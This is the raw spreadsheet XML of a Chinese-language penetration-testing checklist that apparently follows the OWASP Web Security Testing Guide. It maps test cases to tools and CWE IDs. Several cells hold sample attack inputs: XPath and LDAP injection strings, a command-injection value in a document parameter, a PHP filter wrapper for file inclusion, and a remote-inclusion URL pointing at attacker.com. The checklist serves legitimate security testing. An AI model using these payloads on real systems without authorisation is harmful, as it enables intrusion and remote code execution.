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4605" activeTab="12"/>
  </bookViews>
  <sheets>
    <sheet name="1" sheetId="1" r:id="rId1"/>
    <sheet name="2" sheetId="2" r:id="rId2"/>
    <sheet name="3" sheetId="3" r:id="rId3"/>
    <sheet name="4" sheetId="4" r:id="rId4"/>
    <sheet name="5" sheetId="5" r:id="rId5"/>
    <sheet name="6" sheetId="6" r:id="rId6"/>
    <sheet name="7" sheetId="7" r:id="rId7"/>
    <sheet name="8" sheetId="8" r:id="rId8"/>
    <sheet name="9" sheetId="9" r:id="rId9"/>
    <sheet name="10" sheetId="10" r:id="rId10"/>
    <sheet name="11" sheetId="11" r:id="rId11"/>
    <sheet name="12" sheetId="12" r:id="rId12"/>
    <sheet name="问题汇总" sheetId="13" r:id="rId13"/>
  </sheets>
  <definedNames>
    <definedName name="_xlnm._FilterDatabase" localSheetId="0" hidden="1">'1'!$A$3:$J$13</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="1" hidden="1">'2'!$A$3:$J$16</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="2" hidden="1">'3'!$A$3:$J$8</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="3" hidden="1">'4'!$A$3:$J$14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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="940" uniqueCount="546">
  <si>
    <t>1.信息收集</t>
  </si>
  <si>
    <t>ID</t>
  </si>
  <si>
    <t>WSTG-ID</t>
  </si>
  <si>
    <t>测试名称</t>
  </si>
  <si>
    <t>用例</t>
  </si>
  <si>
    <t>工具</t>
  </si>
  <si>
    <t>OWASP Top 10</t>
  </si>
  <si>
    <t>CWE</t>
  </si>
  <si>
    <t>结果</t>
  </si>
  <si>
    <t>受影响对象</t>
  </si>
  <si>
    <t>执行状态</t>
  </si>
  <si>
    <t>1.1</t>
  </si>
  <si>
    <t>WSTG-INFO-01</t>
  </si>
  <si>
    <t>对信息泄露进行搜索引擎发现侦察</t>
  </si>
  <si>
    <t>确定应用程序、系统或组织的哪些敏感设计和配置信息直接（在组织的网站上）或间接（通过第三方服务）暴露。</t>
  </si>
  <si>
    <t>Google Hacking
Shodan
Recon-ng</t>
  </si>
  <si>
    <t>NA</t>
  </si>
  <si>
    <t>未开始</t>
  </si>
  <si>
    <t>1.2</t>
  </si>
  <si>
    <t>WSTG-INFO-02</t>
  </si>
  <si>
    <t>网络服务器指纹识别</t>
  </si>
  <si>
    <t>确定正在运行的 Web 服务器的版本和类型，以便进一步发现任何已知漏洞。</t>
  </si>
  <si>
    <t>Wappalyzer
Nikto</t>
  </si>
  <si>
    <t>A5
A6</t>
  </si>
  <si>
    <t>CWE-756
CWE-1352</t>
  </si>
  <si>
    <t>1.3</t>
  </si>
  <si>
    <t>WSTG-INFO-03</t>
  </si>
  <si>
    <t>检查网络服务器元文件是否存在信息泄漏</t>
  </si>
  <si>
    <t>1.通过分析元数据文件（robots.txt、&lt;META&gt; 标签、sitemap.xml）识别隐藏或混淆的路径和功能。
2.提取并映射其他信息，可以更好地理解现有系统。</t>
  </si>
  <si>
    <t>Browser
Curl
Burpsuite/ZAP</t>
  </si>
  <si>
    <t>A1</t>
  </si>
  <si>
    <t>CWE-200</t>
  </si>
  <si>
    <t>1.4</t>
  </si>
  <si>
    <t>WSTG-INFO-04</t>
  </si>
  <si>
    <t>枚举 Web 服务器上的应用程序</t>
  </si>
  <si>
    <t>1.枚举 Web 服务器上存在的范围内的应用程序。
2.查找托管在网络服务器（虚拟主机/子域）、非标准端口、DNS 区域传输中的应用程序。</t>
  </si>
  <si>
    <t>dnsrecon
Nmap</t>
  </si>
  <si>
    <t>1.5</t>
  </si>
  <si>
    <t>WSTG-INFO-05</t>
  </si>
  <si>
    <t>检查网页内容是否存在信息泄露</t>
  </si>
  <si>
    <t>1.检查网页注释、元数据并重定向正文以查找任何信息泄露。
2.收集 JavaScript 文件并检查 JS 代码，以更好地了解应用程序并查找任何信息泄漏。
3.识别源映射文件或其他前端调试文件是否存在。</t>
  </si>
  <si>
    <t>CWE-200
CWE-540</t>
  </si>
  <si>
    <t>1.6</t>
  </si>
  <si>
    <t>WSTG-INFO-06</t>
  </si>
  <si>
    <t>确定应用程序入口点</t>
  </si>
  <si>
    <t>通过请求和响应分析识别可能的入口和注入点，其中包括隐藏字段、参数、方法 HTTP 标头分析。</t>
  </si>
  <si>
    <t>OWASP ASD
Burpsuite/ZAP</t>
  </si>
  <si>
    <t>1.7</t>
  </si>
  <si>
    <t>WSTG-INFO-07</t>
  </si>
  <si>
    <t>通过应用程序映射执行路径</t>
  </si>
  <si>
    <t>1.绘制目标应用程序并了解主要工作流程。
2.使用与应用程序演练一致的 HTTP(s) 代理蜘蛛/爬虫功能。</t>
  </si>
  <si>
    <t>Burpsuite/ZAP</t>
  </si>
  <si>
    <t>1.8</t>
  </si>
  <si>
    <t>WSTG-INFO-08</t>
  </si>
  <si>
    <t>Web应用程序框架指纹识别</t>
  </si>
  <si>
    <t>1.对 Web 应用程序使用的组件进行指纹识别。
2.从 HTTP 标头、Cookie、源代码、特定文件和文件夹、错误消息中查找 Web 应用程序框架/CMS 的类型。</t>
  </si>
  <si>
    <t>Whatweb
Wappalyzer
CMSMap</t>
  </si>
  <si>
    <t>CWE-756
CWE-1104</t>
  </si>
  <si>
    <t>1.9</t>
  </si>
  <si>
    <t>WSTG-INFO-09</t>
  </si>
  <si>
    <t>Web应用程序指纹识别</t>
  </si>
  <si>
    <t>N/A，此内容已合并到：WSTG-INFO-08</t>
  </si>
  <si>
    <t>1.10</t>
  </si>
  <si>
    <t>WSTG-INFO-10</t>
  </si>
  <si>
    <t>应用程序映射归档</t>
  </si>
  <si>
    <t>1.了解应用程序的架构和所使用的技术。
2.确定应用程序架构是否在应用程序和网络组件上：
应用：Web 服务器、CMS、PaaS、无服务器、微服务、静态存储、第三方服务/API
网络和安全：反向代理、IPS、WAF。</t>
  </si>
  <si>
    <t>WAFW00F
Nmap</t>
  </si>
  <si>
    <t>标志</t>
  </si>
  <si>
    <t>通过</t>
  </si>
  <si>
    <t>有问题</t>
  </si>
  <si>
    <t>N/A</t>
  </si>
  <si>
    <t>2. 配置和部署管理测试</t>
  </si>
  <si>
    <t>2.1</t>
  </si>
  <si>
    <t>WSTG-CONF-01</t>
  </si>
  <si>
    <t>测试网络基础设施配置</t>
  </si>
  <si>
    <t>1.检查网络中应用程序的配置集并验证它们是否容易受到攻击。 
2.验证所使用的框架和系统是否安全，并且不会因未维护的软件或默认设置和凭据而受到已知漏洞的影响。</t>
  </si>
  <si>
    <t>Nessus
Nmap</t>
  </si>
  <si>
    <t>A1
A5
A6</t>
  </si>
  <si>
    <t>CWE-284
CWE-1349
CWE-1352</t>
  </si>
  <si>
    <t>2.2</t>
  </si>
  <si>
    <t>WSTG-CONF-02</t>
  </si>
  <si>
    <t>测试应用平台配置</t>
  </si>
  <si>
    <t>1.确保默认文件和已知文件已被删除。
2.审查配置和服务器处理（40*、50*）。
3.验证生产环境中没有留下任何调试代码或扩展。
4.审查为应用程序设置的日志记录机制，包括日志位置、日志存储、日志轮换、日志访问控制、日志审查。</t>
  </si>
  <si>
    <t>Browser
Nikto
CIS Benchmarks</t>
  </si>
  <si>
    <t>A1
A5
A9</t>
  </si>
  <si>
    <t>CWE-13
CWE-117
CWE-223
CWE-200
CWE-201
CWE-489
CWE-532
CWE-548
CWE-651
CWE-778</t>
  </si>
  <si>
    <t>2.3</t>
  </si>
  <si>
    <t>WSTG-CONF-03</t>
  </si>
  <si>
    <t>测试敏感信息的文件扩展名处理</t>
  </si>
  <si>
    <t>1. 清除敏感文件扩展名或可能包含原始数据的扩展名（*例如*脚本、原始数据、凭据等）。
2.查找重要文件、信息（.asa、.inc、.sql、zip、tar、pdf、txt等）
3.验证规则集上不存在系统框架绕过。</t>
  </si>
  <si>
    <t>Browser
Nikto
DirSearch
ffuf</t>
  </si>
  <si>
    <t>CWE-200
CWE-425
CWE-552</t>
  </si>
  <si>
    <t>2.4</t>
  </si>
  <si>
    <t>WSTG-CONF-04</t>
  </si>
  <si>
    <t>查看旧备份和未引用文件中的敏感信息</t>
  </si>
  <si>
    <t>1.查找并分析可能包含敏感信息的未引用文件。
2.检查JS源代码、注释、缓存文件、备份文件（.old、.bak、.inc、.src）以及文件名猜测。</t>
  </si>
  <si>
    <t>CWE-200
CWE-531
CWE-538</t>
  </si>
  <si>
    <t>2.5</t>
  </si>
  <si>
    <t>WSTG-CONF-05</t>
  </si>
  <si>
    <t>枚举基础设施和应用程序管理界面</t>
  </si>
  <si>
    <t>1.识别隐藏的管理员界面和功能。
2.目录和文件枚举、源中的注释和链接（/admin、/administrator、/backoffice、/backend 等）、备用服务器端口（Tomcat/8080）。</t>
  </si>
  <si>
    <t>Burpsuite/ZAP
DirSearch
ffuf</t>
  </si>
  <si>
    <t>A1
A4</t>
  </si>
  <si>
    <t>CWE-284
CWE-419</t>
  </si>
  <si>
    <t>2.6</t>
  </si>
  <si>
    <t>WSTG-CONF-06</t>
  </si>
  <si>
    <t>测试 HTTP 方法</t>
  </si>
  <si>
    <t>1.使用OPTIONS枚举支持的HTTP方法。
2.访问控制绕过测试（GET-&gt;HEAD-&gt;FOO）。
3.测试HTTP方法重写技术。</t>
  </si>
  <si>
    <t>netcat
curl</t>
  </si>
  <si>
    <t>A5</t>
  </si>
  <si>
    <t>CWE-650
CWE-749</t>
  </si>
  <si>
    <t>2.7</t>
  </si>
  <si>
    <t>WSTG-CONF-07</t>
  </si>
  <si>
    <t>测试 HTTP 严格传输安全性</t>
  </si>
  <si>
    <t>1.检查 HSTS 标头及其有效性。
2.通过HTTP响应头识别Web服务器上的HSTS头：
curl -s -D- https://domain.com/ | grep Strict</t>
  </si>
  <si>
    <t>Burpsuite/ZAP
curl</t>
  </si>
  <si>
    <t>CWE-523</t>
  </si>
  <si>
    <t>2.8</t>
  </si>
  <si>
    <t>WSTG-CONF-08</t>
  </si>
  <si>
    <t>测试 RIA 跨域策略</t>
  </si>
  <si>
    <t>分析策略文件 (crossdomain.xml/clientaccesspolicy.xml) 和allow-access-from 允许的权限。</t>
  </si>
  <si>
    <t>CWE-942</t>
  </si>
  <si>
    <t>2.9</t>
  </si>
  <si>
    <t>WSTG-CONF-09</t>
  </si>
  <si>
    <t>测试文件权限</t>
  </si>
  <si>
    <t>1.检查并识别任何恶意文件权限。
2. 识别默认情况下安装时权限设置为全局可读的配置文件。</t>
  </si>
  <si>
    <t>Burpsuite/ZAP
Nikto</t>
  </si>
  <si>
    <t>A1
A5</t>
  </si>
  <si>
    <t>CWE-552
CWE-732</t>
  </si>
  <si>
    <t>2.10</t>
  </si>
  <si>
    <t>WSTG-CONF-10</t>
  </si>
  <si>
    <t>子域接管测试</t>
  </si>
  <si>
    <t>1.枚举所有可能的域（以前的和当前的）。
2.识别被遗忘或配置错误的域。</t>
  </si>
  <si>
    <t>Dnsrecon</t>
  </si>
  <si>
    <t>CWE-673</t>
  </si>
  <si>
    <t>2.11</t>
  </si>
  <si>
    <t>WSTG-CONF-11</t>
  </si>
  <si>
    <t>测试云存储</t>
  </si>
  <si>
    <t>评估存储服务的访问控制配置是否正确到位。</t>
  </si>
  <si>
    <t>AWS CLI
S3Scanner</t>
  </si>
  <si>
    <t>CWE-264</t>
  </si>
  <si>
    <t>2.12</t>
  </si>
  <si>
    <t>WSTG-CONF-12</t>
  </si>
  <si>
    <t>内容安全策略测试</t>
  </si>
  <si>
    <t>查看 Content-Security-Policy 标头或元元素以识别错误配置。</t>
  </si>
  <si>
    <t>Burpsuite CSP Auditor</t>
  </si>
  <si>
    <t>CWE-1021</t>
  </si>
  <si>
    <t>2.13</t>
  </si>
  <si>
    <t>WSTG-CONF-13</t>
  </si>
  <si>
    <t>测试路径混乱</t>
  </si>
  <si>
    <t>确保应用程序路径配置正确。</t>
  </si>
  <si>
    <t>CWE-436</t>
  </si>
  <si>
    <t>3. 身份管理测试</t>
  </si>
  <si>
    <t>3.1</t>
  </si>
  <si>
    <t>WSTG-IDNT-01</t>
  </si>
  <si>
    <t>测试角色定义</t>
  </si>
  <si>
    <t>1. 识别并记录应用程序使用的角色。
2.尝试转换、改变或访问另一个角色。
3.审查角色的粒度以及所授予权限背后的要求。</t>
  </si>
  <si>
    <t>A4</t>
  </si>
  <si>
    <t>CWE-266
CWE-269</t>
  </si>
  <si>
    <t>3.2</t>
  </si>
  <si>
    <t>WSTG-IDNT-02</t>
  </si>
  <si>
    <t>测试用户注册流程</t>
  </si>
  <si>
    <t>1.验证用户注册的身份要求是否符合业务和安全要求。
2.验证注册过程。</t>
  </si>
  <si>
    <t>CWE-419</t>
  </si>
  <si>
    <t>3.3</t>
  </si>
  <si>
    <t>WSTG-IDNT-03</t>
  </si>
  <si>
    <t>测试帐户配置流程</t>
  </si>
  <si>
    <t>验证哪些帐户可以配置其他帐户以及类型。</t>
  </si>
  <si>
    <t>CWE-269
CWE-280</t>
  </si>
  <si>
    <t>3.4</t>
  </si>
  <si>
    <t>WSTG-IDNT-04</t>
  </si>
  <si>
    <t>帐户枚举和可猜测用户帐户的测试</t>
  </si>
  <si>
    <t>1.检查与用户识别相关的流程（*例如*注册、登录等）。
2.通过响应分析尽可能枚举用户。</t>
  </si>
  <si>
    <t>A7</t>
  </si>
  <si>
    <t>CWE-204</t>
  </si>
  <si>
    <t>3.5</t>
  </si>
  <si>
    <t>WSTG-IDNT-05</t>
  </si>
  <si>
    <t>测试薄弱或未强制执行的用户名策略</t>
  </si>
  <si>
    <t>1.确定一致的帐户名称结构是否会使应用程序容易受到帐户枚举的攻击。
2.用户帐户名称通常是高度结构化的（例如，Joe Bloggs 帐户名称是 jbloggs，Fred Nurks 帐户名称是 fnurks），并且很容易猜到有效的帐户名称。
3.确定应用程序的错误消息是否允许帐户枚举。</t>
  </si>
  <si>
    <t>4. 认证测试</t>
  </si>
  <si>
    <t>4.1</t>
  </si>
  <si>
    <t>WSTG-ATHN-01</t>
  </si>
  <si>
    <t>测试通过加密通道传输的凭证</t>
  </si>
  <si>
    <t>N/A，此内容已合并到：WSTG-CRYP-03</t>
  </si>
  <si>
    <t>4.2</t>
  </si>
  <si>
    <t>WSTG-ATHN-02</t>
  </si>
  <si>
    <t>测试默认凭证</t>
  </si>
  <si>
    <t>确定应用程序是否有任何具有默认密码的用户帐户。</t>
  </si>
  <si>
    <t>Browser
Burpsuite/ZAP
Hydra</t>
  </si>
  <si>
    <t>CWE-1392</t>
  </si>
  <si>
    <t>4.3</t>
  </si>
  <si>
    <t>WSTG-ATHN-03</t>
  </si>
  <si>
    <t>弱锁定机制测试</t>
  </si>
  <si>
    <t>1.评估账户锁定机制缓解暴力破解密码猜测的能力。
2.评估解锁机制对未经授权账户解锁的抵抗力。</t>
  </si>
  <si>
    <t>CWE-307</t>
  </si>
  <si>
    <t>4.4</t>
  </si>
  <si>
    <t>WSTG-ATHN-04</t>
  </si>
  <si>
    <t>绕过身份验证架构的测试</t>
  </si>
  <si>
    <t>1.确保身份验证适用于所有需要身份验证的服务。
2.强制浏览（/admin/main.php、/page.asp?authenticated=yes）、参数修改、Session ID预测、SQL注入</t>
  </si>
  <si>
    <t>A1
A7</t>
  </si>
  <si>
    <t>CWE-287
CWE-288
CWE-290
CWE-294
CWE-302
CWE-304
CWE-306
CWE-425
CWE-804</t>
  </si>
  <si>
    <t>4.5</t>
  </si>
  <si>
    <t>WSTG-ATHN-05</t>
  </si>
  <si>
    <t>测试易受攻击的记住密码</t>
  </si>
  <si>
    <t>1.验证生成的会话是否得到安全管理，并且不会将用户的凭据置于危险之中（例如，cookie）
2.验证凭证是否不是以明文形式存储，而是以散列形式存储。  Autocompleted=off?</t>
  </si>
  <si>
    <t>A4
A5</t>
  </si>
  <si>
    <t>CWE-315
CWE-522
CWE-524</t>
  </si>
  <si>
    <t>4.6</t>
  </si>
  <si>
    <t>WSTG-ATHN-06</t>
  </si>
  <si>
    <t>测试浏览器缓存弱点</t>
  </si>
  <si>
    <t>1.检查应用程序是否在客户端存储敏感信息。
2.检查是否可以在未经授权的情况下进行访问。
3.注销后单击“后退”按钮检查浏览器历史记录问题。
4.从HTTP响应头检查浏览器缓存问题（Cache-Control：no-cache）</t>
  </si>
  <si>
    <t>Browser
Burpsuite/ZAP</t>
  </si>
  <si>
    <t>CWE-525</t>
  </si>
  <si>
    <t>4.7</t>
  </si>
  <si>
    <t>WSTG-ATHN-07</t>
  </si>
  <si>
    <t>弱密码策略测试</t>
  </si>
  <si>
    <t>1.通过评估密码的长度、复杂性、重用和超时要求，确定应用程序对使用可用密码字典进行暴力破解密码猜测的抵抗力。
2.检查新用户帐户是否使用弱密码或可预测密码创建。</t>
  </si>
  <si>
    <t>Burpsuite/ZAP
Hydra</t>
  </si>
  <si>
    <t>CWE-521
CWE-1391</t>
  </si>
  <si>
    <t>4.8</t>
  </si>
  <si>
    <t>WSTG-ATHN-08</t>
  </si>
  <si>
    <t>测试弱安全问题答案</t>
  </si>
  <si>
    <t>1.确定问题的复杂性和简单程度（弱预生成问题、弱自生成问题）。
2.评估可能的用户答案和强力能力。</t>
  </si>
  <si>
    <t>CWE-640</t>
  </si>
  <si>
    <t>4.9</t>
  </si>
  <si>
    <t>WSTG-ATHN-09</t>
  </si>
  <si>
    <t>测试弱密码更改或重置功能</t>
  </si>
  <si>
    <t>1.确定密码更改和重置功能是否允许帐户被盗用。
2.测试密码重置（以纯文本形式显示旧密码？、通过电子邮件发送？、确认电子邮件上的随机令牌？）
3.测试密码更改（需要旧密码吗？）</t>
  </si>
  <si>
    <t>CWE-620
CWE-640</t>
  </si>
  <si>
    <t>4.10</t>
  </si>
  <si>
    <t>WSTG-ATHN-10</t>
  </si>
  <si>
    <t>测试替代渠道中较弱的身份验证</t>
  </si>
  <si>
    <t>1.确定替代的身份验证渠道。
2.评估所使用的安全措施以及其替代方式上是否存在任何绕过。</t>
  </si>
  <si>
    <t>CWE-288</t>
  </si>
  <si>
    <t>4.11</t>
  </si>
  <si>
    <t>WSTG-ATHN-11</t>
  </si>
  <si>
    <t>测试多重身份验证 (MFA)</t>
  </si>
  <si>
    <t>1. 确定应用程序使用的 MFA 类型。
2.确定MFA实施是否稳健且安全。
3.尝试绕过MFA。</t>
  </si>
  <si>
    <t>CWE-288
CWE-304
CWE-308</t>
  </si>
  <si>
    <t>5. 授权测试</t>
  </si>
  <si>
    <t>5.1</t>
  </si>
  <si>
    <t>WSTG-ATHZ-01</t>
  </si>
  <si>
    <t>测试目录遍历文件包含</t>
  </si>
  <si>
    <t>1.识别与路径遍历相关的注入点。
2.评估绕过技术并确定路径遍历的范围（点-点-斜杠攻击、本地/远程文件包含）。</t>
  </si>
  <si>
    <t>CWE-22
CWE-23
CWE-35
CWE-829</t>
  </si>
  <si>
    <t>5.2</t>
  </si>
  <si>
    <t>WSTG-ATHZ-02</t>
  </si>
  <si>
    <t>绕过授权模式测试</t>
  </si>
  <si>
    <t>1.评估是否可以进行水平或垂直访问。
2.通过强制浏览访问管理功能（/admin/addUser）</t>
  </si>
  <si>
    <t>CWE-285
CWE-732
CWE-862
CWE-863</t>
  </si>
  <si>
    <t>5.3</t>
  </si>
  <si>
    <t>WSTG-ATHZ-03</t>
  </si>
  <si>
    <t>权限提升测试</t>
  </si>
  <si>
    <t>1.识别与角色/权限操纵相关的注入点。 例如：将某些参数 groupid=2 更改为 groupid=1。
2.验证用户无法在应用程序内修改其权限或角色。
3.模糊或以其他方式尝试绕过安全措施。</t>
  </si>
  <si>
    <t>CWE-269
CWE-639</t>
  </si>
  <si>
    <t>5.4</t>
  </si>
  <si>
    <t>WSTG-ATHZ-04</t>
  </si>
  <si>
    <t>测试不安全的直接对象引用</t>
  </si>
  <si>
    <t>1.识别可能发生对象引用的点。
2.评估访问控制措施以及它们是否容易受到 IDOR 的攻击。 例如：强制更改参数值 (?invoice=123 -&gt; ?invoice=456)</t>
  </si>
  <si>
    <t>CWE-639</t>
  </si>
  <si>
    <t>5.5</t>
  </si>
  <si>
    <t>WSTG-ATHZ-05</t>
  </si>
  <si>
    <t>测试 OAuth 弱点</t>
  </si>
  <si>
    <t>确定 OAuth2 实现是否容易受到攻击或使用已弃用或自定义的实现。</t>
  </si>
  <si>
    <t>CWE-290
CWE-345
CWE-798</t>
  </si>
  <si>
    <t>6. 会话管理测试</t>
  </si>
  <si>
    <t>6.1</t>
  </si>
  <si>
    <t>WSTG-SESS-01</t>
  </si>
  <si>
    <t>测试会话管理架构</t>
  </si>
  <si>
    <t>1.尽可能为同一用户和不同用户收集会话令牌。
2.分析并确保存在足够的随机性来阻止会话伪造攻击。
3.修改未签名且包含可操纵信息的cookie。</t>
  </si>
  <si>
    <t>A2
A4</t>
  </si>
  <si>
    <t>CWE-315
CWE-330
CWE-539
CWE-694</t>
  </si>
  <si>
    <t>6.2</t>
  </si>
  <si>
    <t>WSTG-SESS-02</t>
  </si>
  <si>
    <t>测试 Cookie 属性</t>
  </si>
  <si>
    <t>确保为 cookie 设置正确的安全配置（HTTPOnly 和安全标志，Samesite=Strict）</t>
  </si>
  <si>
    <t>CWE-16
CWE-614
CWE-1004
CWE-1275</t>
  </si>
  <si>
    <t>6.3</t>
  </si>
  <si>
    <t>WSTG-SESS-03</t>
  </si>
  <si>
    <t>会话固定测试</t>
  </si>
  <si>
    <t>1.分析认证机制及其流程。
2.强制cookie并评估影响。
3.用户认证成功后，检查应用程序是否更新cookie。</t>
  </si>
  <si>
    <t>CWE-384</t>
  </si>
  <si>
    <t>6.4</t>
  </si>
  <si>
    <t>WSTG-SESS-04</t>
  </si>
  <si>
    <t>测试公开的会话变量</t>
  </si>
  <si>
    <t>1.确保实施适当的加密（会话令牌漏洞的加密和重用）。
2.检查缓存配置。
3.评估通道和方法的安全性（使用GET方法发送sessionID？）</t>
  </si>
  <si>
    <t>CWE-598</t>
  </si>
  <si>
    <t>6.5</t>
  </si>
  <si>
    <t>WSTG-SESS-05</t>
  </si>
  <si>
    <t>跨站请求伪造测试</t>
  </si>
  <si>
    <t>1.确定是否可以代表用户发起非用户发起的请求。
2.进行URL解析，无需任何token即可直接访问功能。</t>
  </si>
  <si>
    <t>CWE-352</t>
  </si>
  <si>
    <t>6.6</t>
  </si>
  <si>
    <t>WSTG-SESS-06</t>
  </si>
  <si>
    <t>测试注销功能</t>
  </si>
  <si>
    <t>1.评估注销 UI。
2.分析会话超时以及注销后会话是否被正确终止。</t>
  </si>
  <si>
    <t>CWE-613</t>
  </si>
  <si>
    <t>6.7</t>
  </si>
  <si>
    <t>WSTG-SESS-07</t>
  </si>
  <si>
    <t>测试会话超时</t>
  </si>
  <si>
    <t>验证是否存在固定会话超时，超时后，所有会话令牌都应被销毁或不可用。</t>
  </si>
  <si>
    <t>6.8</t>
  </si>
  <si>
    <t>WSTG-SESS-08</t>
  </si>
  <si>
    <t>测试会话困惑</t>
  </si>
  <si>
    <t>1.识别所有会话变量。
2.打破会话生成的逻辑流程。
3.检查应用程序是否将同一个会话变量用于多个目的。</t>
  </si>
  <si>
    <t>CWE-841</t>
  </si>
  <si>
    <t>6.9</t>
  </si>
  <si>
    <t>WSTG-SESS-09</t>
  </si>
  <si>
    <t>测试会话劫持</t>
  </si>
  <si>
    <t>1.识别易受攻击的会话 cookie。
2.劫持易受攻击的cookie并评估风险级别。</t>
  </si>
  <si>
    <t>A2</t>
  </si>
  <si>
    <t>6.10</t>
  </si>
  <si>
    <t>WSTG-SESS-10</t>
  </si>
  <si>
    <t>测试 JSON Web 令牌</t>
  </si>
  <si>
    <t>1.确定 JWT 是否暴露敏感信息。
2.确定 JWT 是否可以被篡改或修改。</t>
  </si>
  <si>
    <t>CWE-345
CWE-757
CWE-798</t>
  </si>
  <si>
    <t>7. 数据验证测试</t>
  </si>
  <si>
    <t>7.1</t>
  </si>
  <si>
    <t>WSTG-INPV-01</t>
  </si>
  <si>
    <t>反射跨站脚本测试</t>
  </si>
  <si>
    <t>1.确定响应中反映的变量。
2.评估他们接受的输入以及返回时应用的编码（如果有）。</t>
  </si>
  <si>
    <t>A3</t>
  </si>
  <si>
    <t>CWE-79</t>
  </si>
  <si>
    <t>7.2</t>
  </si>
  <si>
    <t>WSTG-INPV-02</t>
  </si>
  <si>
    <t>测试存储的跨站点脚本</t>
  </si>
  <si>
    <t>1.识别反映在客户端的存储输入。
2.评估他们接受的输入以及返回时应用的编码（如果有）。</t>
  </si>
  <si>
    <t>7.3</t>
  </si>
  <si>
    <t>WSTG-INPV-03</t>
  </si>
  <si>
    <t>HTTP 动词篡改测试</t>
  </si>
  <si>
    <t>N/A，此内容已合并到：WSTG-CONF-06</t>
  </si>
  <si>
    <t>7.4</t>
  </si>
  <si>
    <t>WSTG-INPV-04</t>
  </si>
  <si>
    <t>HTTP参数污染测试</t>
  </si>
  <si>
    <t>1.确定后端和使用的解析方法。
2.评估注入点并尝试使用 HPP (HTTP 参数污染)绕过输入过滤器。</t>
  </si>
  <si>
    <t>CWE-235</t>
  </si>
  <si>
    <t>7.5</t>
  </si>
  <si>
    <t>WSTG-INPV-05</t>
  </si>
  <si>
    <t>SQL注入测试</t>
  </si>
  <si>
    <t>1.识别SQL注入点。
2.评估注入的严重程度以及通过注入可以实现的访问级别。</t>
  </si>
  <si>
    <t>Burpsuite/ZAP SQLMap
NoSQLMap</t>
  </si>
  <si>
    <t>CWE-89</t>
  </si>
  <si>
    <t>7.6</t>
  </si>
  <si>
    <t>WSTG-INPV-06</t>
  </si>
  <si>
    <t>LDAP 注入测试</t>
  </si>
  <si>
    <t>1.识别LDAP注入点：
/ldapsearch?user=*
user=*user=*)(uid=*))(|(uid=*
pass=password
2.评估注射的严重程度：</t>
  </si>
  <si>
    <t>CWE-90</t>
  </si>
  <si>
    <t>7.7</t>
  </si>
  <si>
    <t>WSTG-INPV-07</t>
  </si>
  <si>
    <t>XML 注入测试</t>
  </si>
  <si>
    <t>1.使用XML元字符识别XML注入点：
', " , &lt;&gt;, &lt;!--/--&gt;, &amp;, &lt;![CDATA[ / ]]&gt;, XXE, TAG。
2.评估可实现的攻击类型及其严重性。</t>
  </si>
  <si>
    <t>Burpsuite/ZAP
Wfuzz</t>
  </si>
  <si>
    <t>CWE-91
CWE-611
CWE-652</t>
  </si>
  <si>
    <t>7.8</t>
  </si>
  <si>
    <t>WSTG-INPV-08</t>
  </si>
  <si>
    <t>SSI 注入测试</t>
  </si>
  <si>
    <t>1.使用以下字符识别 SSI 注入点（存在 .shtml 扩展名）：
&lt; ! # = / . " - &gt; and [a-zA-Z0-9]
2.评估注射的严重程度。</t>
  </si>
  <si>
    <t>CWE-97</t>
  </si>
  <si>
    <t>7.9</t>
  </si>
  <si>
    <t>WSTG-INPV-09</t>
  </si>
  <si>
    <t>XPath 注入测试</t>
  </si>
  <si>
    <t>通过提供单引号 (') 检查 XML 错误枚举来识别 XPATH 注入点：
Username: ‘ or ‘1’ = ‘1
Password: ‘ or ‘1’ = ‘1</t>
  </si>
  <si>
    <t>CWE-91
CWE-643</t>
  </si>
  <si>
    <t>7.10</t>
  </si>
  <si>
    <t>WSTG-INPV-10</t>
  </si>
  <si>
    <t>IMAP SMTP 注入测试</t>
  </si>
  <si>
    <t>1.使用特殊字符（即：\、‘、“、@、#、!、|）识别 IMAP/SMTP 注入点（标头、正文、页脚）
2.了解系统的数据流程和部署结构。
3.评估注入影响。</t>
  </si>
  <si>
    <t>CWE-147</t>
  </si>
  <si>
    <t>7.11</t>
  </si>
  <si>
    <t>WSTG-INPV-11</t>
  </si>
  <si>
    <t>代码注入测试</t>
  </si>
  <si>
    <t>1.确定可以将代码注入应用程序的注入点。
2.使用点-点-斜杠 (../../)、PHP 包装器 (php://filter/convert.base64-encode/resource) 检查 LFI。
3.检查来自恶意 URL 的 RFI
?page.php?file=http://attacker.com/malicious_page
4.评估注射严重程度。</t>
  </si>
  <si>
    <t>Burpsuite/ZAP
Liffy
LFImap</t>
  </si>
  <si>
    <t>CWE-22
CWE-94
CWE-95
CWE-98
CWE-829</t>
  </si>
  <si>
    <t>7.12</t>
  </si>
  <si>
    <t>WSTG-INPV-12</t>
  </si>
  <si>
    <t>命令注入测试</t>
  </si>
  <si>
    <t>识别并评估带有特殊字符的命令注入点（即：| ; &amp; $ &gt; &lt; ' !)
例如：?doc=Doc1.pdf+|+Dir c:\</t>
  </si>
  <si>
    <t>Burpsuite/ZAP Commix</t>
  </si>
  <si>
    <t>CWE-77
CWE-78</t>
  </si>
  <si>
    <t>7.13</t>
  </si>
  <si>
    <t>WSTG-INPV-13</t>
  </si>
  <si>
    <t>测试格式字符串注入</t>
  </si>
  <si>
    <t>评估将格式字符串转换说明符注入用户控制的字段是否会导致应用程序出现不良行为。</t>
  </si>
  <si>
    <t>Immunity Canvas
Spike
MSF</t>
  </si>
  <si>
    <t>CWE-134</t>
  </si>
  <si>
    <t>7.14</t>
  </si>
  <si>
    <t>WSTG-INPV-14</t>
  </si>
  <si>
    <t>测试潜伏漏洞</t>
  </si>
  <si>
    <t>1. 识别已存储的进样并需要对已存储的进样执行调用步骤。 （即：CSV 注入、盲存储 XSS、文件上传）
2.了解回调步骤是如何发生的。
3.如果可能的话，设置侦听器或激活调用步骤。</t>
  </si>
  <si>
    <t>Burpsuite/ZAP
BeEF</t>
  </si>
  <si>
    <t>CWE-79
CWE-434
CWE-1236</t>
  </si>
  <si>
    <t>7.15</t>
  </si>
  <si>
    <t>WSTG-INPV-15</t>
  </si>
  <si>
    <t>HTTP 拆分走私测试</t>
  </si>
  <si>
    <t>1.评估应用程序是否容易受到分裂，确定可以实现哪些可能的攻击。
2.评估通信链是否容易受到走私的影响，确定可以实现哪些可能的攻击。</t>
  </si>
  <si>
    <t>A3
A4</t>
  </si>
  <si>
    <t>CWE-93
CWE-113
CWE-444</t>
  </si>
